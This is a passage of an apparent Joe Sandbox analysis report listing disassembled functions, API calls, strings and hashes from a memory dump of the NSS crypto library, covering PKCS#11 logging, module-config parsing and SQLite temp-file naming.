CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6CAA2319
rv = %s, xrefs: 6CAA2340
CKR_OBJECT_HANDLE_INVALID, xrefs: 6CAA204D
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6CAA232E
CKR_MUTEX_BAD, xrefs: 6CAA1F49
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6CAA1F0F
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6CAA227F
CKR_NEW_PIN_MODE, xrefs: 6CAA1E9F
CKR_SIGNATURE_INVALID, xrefs: 6CAA20CF
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6CAA2275
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6CAA1DE0

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: c7af8788b6d17547a02c09be7ad1b0d093ec18c435274294491f8f06340ca290
Instruction ID: a7b9c884b78a3aed334d32d726ce9085b1e90b7aa8c261cf58463f7aa58d85e4
Opcode Fuzzy Hash: c7af8788b6d17547a02c09be7ad1b0d093ec18c435274294491f8f06340ca290
Instruction Fuzzy Hash: 5F61E13064D084D6D63C0DCFC1A937C7124AB07305F64A3B7E6899FE50DA65CAE746A7

Function 6CAD5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CAD5E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CAD5E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CAD5E5C
free.MOZGLUE(00000000), ref: 6CAD5E7E
free.MOZGLUE(00000000), ref: 6CAD5E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6CAD5EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CAD5EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CAD5ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CAD5EF0
free.MOZGLUE(00000000), ref: 6CAD5F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CAD5F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CAD5F5B
free.MOZGLUE(00000000), ref: 6CAD5F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CAD5FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CAD5FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CAD5FC4
free.MOZGLUE(00000000), ref: 6CAD5FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CAD5FE9
free.MOZGLUE(00000000), ref: 6CAD5FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CAD600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAD6027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CAD605A
PR_smprintf.NSS3(6CBAAAF9,00000000), ref: 6CAD606A
free.MOZGLUE(00000000), ref: 6CAD607C
free.MOZGLUE(00000000), ref: 6CAD609A
free.MOZGLUE(00000000), ref: 6CAD60B2
free.MOZGLUE(?), ref: 6CAD60CE

Strings

noModDB, xrefs: 6CAD5EEA
forceSecmodChoice, xrefs: 6CAD5F55
configDir=, xrefs: 6CAD5F9D
readOnly, xrefs: 6CAD5E56
secmod.db, xrefs: 6CAD5EA0
secmod=, xrefs: 6CAD5FB1
pkcs11.txt, xrefs: 6CAD5F47, 6CAD5F7C, 6CAD603A, 6CAD6053
%s/%s, xrefs: 6CAD6055
flags, xrefs: 6CAD5E3A, 6CAD5EC6, 6CAD5F30

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 0d73691d4173d9465cfe470ab8ab269d8bda15795e0ea8c2338eab270ef10e59
Instruction ID: 028d2ab07dfae3d5c26d0537cecbe0421b3428c1e0c65cd5375f7c57587230d0
Opcode Fuzzy Hash: 0d73691d4173d9465cfe470ab8ab269d8bda15795e0ea8c2338eab270ef10e59
Instruction Fuzzy Hash: 7B91F7F4D042415BEF019F65DC85BAA3BB4DF09248F0D0460EC55DBB42EB35E999C7A2

Function 6CAA28A0 Relevance: 49.2, APIs: 12, Strings: 16, Instructions: 155COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6CAA28BD
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6CAA28EF

Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(?), ref: 6CB80B88
Part of subcall function 6CB809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB80C5D
Part of subcall function 6CB809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB80C8D
Part of subcall function 6CB809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB80C9C
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(?), ref: 6CB80CD1
Part of subcall function 6CB809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB80CEC
Part of subcall function 6CB809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB80CFB
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB80D16
Part of subcall function 6CB809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB80D26
Part of subcall function 6CB809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB80D35
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CB80D65
Part of subcall function 6CB809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB80D70
Part of subcall function 6CB809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB80D90
Part of subcall function 6CB809D0: free.MOZGLUE(00000000), ref: 6CB80D99

Part of subcall function 6CA60F00: PR_GetPageSize.NSS3(6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F1B
Part of subcall function 6CA60F00: PR_NewLogModule.NSS3(clock,6CA60936,FFFFE8AE,?,6C9F16B7,00000000,?,6CA60936,00000000,?,6C9F204A), ref: 6CA60F25

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CAA28D6

Part of subcall function 6CB809D0: PR_Now.NSS3 ref: 6CB80A22
Part of subcall function 6CB809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB80A35
Part of subcall function 6CB809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB80A66
Part of subcall function 6CB809D0: PR_GetCurrentThread.NSS3 ref: 6CB80A70
Part of subcall function 6CB809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB80A9D
Part of subcall function 6CB809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB80AC8
Part of subcall function 6CB809D0: PR_vsmprintf.NSS3(?,?), ref: 6CB80AE8
Part of subcall function 6CB809D0: EnterCriticalSection.KERNEL32(?), ref: 6CB80B19
Part of subcall function 6CB809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB80B48
Part of subcall function 6CB809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB80C76
Part of subcall function 6CB809D0: PR_LogFlush.NSS3 ref: 6CB80C7E

PR_LogPrint.NSS3( label = "%.32s",?), ref: 6CAA2963
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6CAA2983
PR_LogPrint.NSS3( model = "%.16s",?), ref: 6CAA29A3
PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6CAA29C3
PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6CAA2A26
PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6CAA2A48
PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6CAA2A66
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6CAA2A8E
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6CAA2AB6

Strings

flags = %s %s %s %s, xrefs: 6CAA2A21
C_GetTokenInfo, xrefs: 6CAA28B8
maxRwSessions = %u, RwSessions = %u, xrefs: 6CAA2A61
maxSessions = %u, Sessions = %u, xrefs: 6CAA2A43
hardware version: %d.%d, xrefs: 6CAA2A89
label = "%.32s", xrefs: 6CAA295E
serial = "%.16s", xrefs: 6CAA29BE
pInfo = 0x%p, xrefs: 6CAA28EA
slotID = 0x%x, xrefs: 6CAA28D1
CKF_USER_PIN_INIT, xrefs: 6CAA29E5
CKF_WRITE_PROTECTED, xrefs: 6CAA29FE, 6CAA2A1F
manufacturerID = "%.32s", xrefs: 6CAA297E
firmware version: %d.%d, xrefs: 6CAA2AB1
CKF_RNG, xrefs: 6CAA2A13, 6CAA2A20
model = "%.16s", xrefs: 6CAA299E
CKF_LOGIN_REQUIRED, xrefs: 6CAA29F3, 6CAA2A1E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo
API String ID: 2460313690-1106672779
Opcode ID: d24dd5bf5bcd85c6b33b696c8f05ded281782dafa7e2765d68b976a498f5c714
Instruction ID: c5ee8887203dd8559fa707246a94b9f94efbe8a8bdcb564ba182e83ef0ff9a71
Opcode Fuzzy Hash: d24dd5bf5bcd85c6b33b696c8f05ded281782dafa7e2765d68b976a498f5c714
Instruction Fuzzy Hash: DD513BB42020C4AFEB048FC4DE9DB6977B5EB4621DF488075EC089BA12DB31EC58CB52

Function 6CA61D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6CA61DA3

Part of subcall function 6CB398D0: calloc.MOZGLUE(00000001,00000084,6CA60936,00000001,?,6CA6102C), ref: 6CB398E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6CA61DB2

Part of subcall function 6CA61240: TlsGetValue.KERNEL32(00000040,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA61267
Part of subcall function 6CA61240: EnterCriticalSection.KERNEL32(?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA6127C
Part of subcall function 6CA61240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA61291
Part of subcall function 6CA61240: PR_Unlock.NSS3(?,?,?,?,6CA6116C,NSPR_LOG_MODULES), ref: 6CA612A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA61DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6CA61E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6CA61EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6CA61ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6CA61EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6CA61F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA61F34
PR_SetLogBuffering.NSS3(00004000), ref: 6CA61F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6CA61F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CA61F83
PR_SetLogFile.NSS3(00000000), ref: 6CA61FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6CA61FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6CA61FCB
free.MOZGLUE(00000000), ref: 6CA61FD2

Strings

NSPR_LOG_MODULES, xrefs: 6CA61DAD
bufsize, xrefs: 6CA61E9B
sync, xrefs: 6CA61E46
NSPR_LOG_FILE, xrefs: 6CA61F69
append, xrefs: 6CA61EE6
Unable to create nspr log file '%s', xrefs: 6CA61FB3
, %n, xrefs: 6CA61E6B
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6CA61E27
timestamp, xrefs: 6CA61EC4
all, xrefs: 6CA61F0E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: c8c2cbdc95f04aa4ff9dae6d2966ab27c0a979311a568261a919f5cf1b3a4e68
Instruction ID: eb3709e106f23c2299a1d2143937792212d74811ce53b1ffc94446dede1c6afd
Opcode Fuzzy Hash: c8c2cbdc95f04aa4ff9dae6d2966ab27c0a979311a568261a919f5cf1b3a4e68
Instruction Fuzzy Hash: ED51D3B1E042499BDF00DBF6DD44BAE7BB8AF15308F080529EA15DBA40F770E598CB91

Function 6CB46E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9FCA30: EnterCriticalSection.KERNEL32(?,?,?,6CA5F9C9,?,6CA5F4DA,6CA5F9C9,?,?,6CA2369A), ref: 6C9FCA7A
Part of subcall function 6C9FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C9FCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6CA0BE66), ref: 6CB46E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CA0BE66), ref: 6CB46E98
sqlite3_snprintf.NSS3(?,00000000,6CBAAAF9,?,?,?,?,?,?,6CA0BE66), ref: 6CB46EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CA0BE66), ref: 6CB46ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CA0BE66), ref: 6CB46EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB46F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB46F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB46F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CA0BE66), ref: 6CB46FA6
sqlite3_snprintf.NSS3(?,00000000,6CBAAAF9,00000000,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB46FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB46FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB46FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB47014
sqlite3_free.NSS3(00000000,?,?,?,?,6CA0BE66), ref: 6CB4701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CA0BE66), ref: 6CB47030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB4705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6CA0BE66), ref: 6CB47079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB47097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CA0BE66), ref: 6CB470A0

Strings

winGetTempname4, xrefs: 6CB47046
winGetTempname5, xrefs: 6CB47071
winGetTempname1, xrefs: 6CB4708F
winGetTempname2, xrefs: 6CB470C4
mz_etilqs_, xrefs: 6CB46F18

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: a998d3ee0909992cbe6e8bab52ba3afa5db4c57e8f0ac127f90f3830a87074e8
Instruction ID: de26c3806fce3438fd362b87755e1a08a47d10c1ea784ac3ba1e80c00cb60182
Opcode Fuzzy Hash: a998d3ee0909992cbe6e8bab52ba3afa5db4c57e8f0ac127f90f3830a87074e8
Instruction Fuzzy Hash: 1A51ADB5A0919167E70097309C51FBF366A8FA2318F158538E815A7BC5FF22E90ED2D3

Function 6CAD4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA875C2,00000000,00000000,00000001), ref: 6CAD5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA875C2,00000000), ref: 6CAD5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAD505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6CAD5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CAD50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA875C2), ref: 6CAD50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAD50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CAD50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD5153
free.MOZGLUE(?), ref: 6CAD516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CAD517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAD5195

Strings

nss=, xrefs: 6CAD5083
library=, xrefs: 6CAD5043
config=, xrefs: 6CAD509B
name=, xrefs: 6CAD5057
parameters=, xrefs: 6CAD506B

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 31065d1b8341fc526df28a52d8fa1609620716ccd83b95c80da35daa1b7929b7
Instruction ID: 991b2b7e8878c4a29273a2d1580781add2060df343ab948e615069e6aee147b2
Opcode Fuzzy Hash: 31065d1b8341fc526df28a52d8fa1609620716ccd83b95c80da35daa1b7929b7
Instruction Fuzzy Hash: 225163F5A011166BEB01DF24DD41AEE37B8AF16248F190020FC59E7741EB25FA59C7B2

Function 6CAA8E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6CAA8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA8EB3

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CAA8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6CAA8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA8F29
PR_LogPrint.NSS3(?,00000000), ref: 6CAA8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CAA8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA8F80
PR_LogPrint.NSS3(?,00000000), ref: 6CAA8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6CAA8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6CAA8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6CAA9047

Strings

hKey = 0x%x, xrefs: 6CAA8F5B, 6CAA8F6B
hSession = 0x%x, xrefs: 6CAA8E8E, 6CAA8E9E
*pulWrappedKeyLen = 0x%x, xrefs: 6CAA9042
pMechanism = 0x%p, xrefs: 6CAA8EE0
pWrappedKey = 0x%p, xrefs: 6CAA8FAD
hWrappingKey = 0x%x, xrefs: 6CAA8F01, 6CAA8F11
C_WrapKey, xrefs: 6CAA8E71
pulWrappedKeyLen = 0x%p, xrefs: 6CAA8FC8
(CK_INVALID_HANDLE), xrefs: 6CAA8EAC, 6CAA8F1F, 6CAA8F79

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
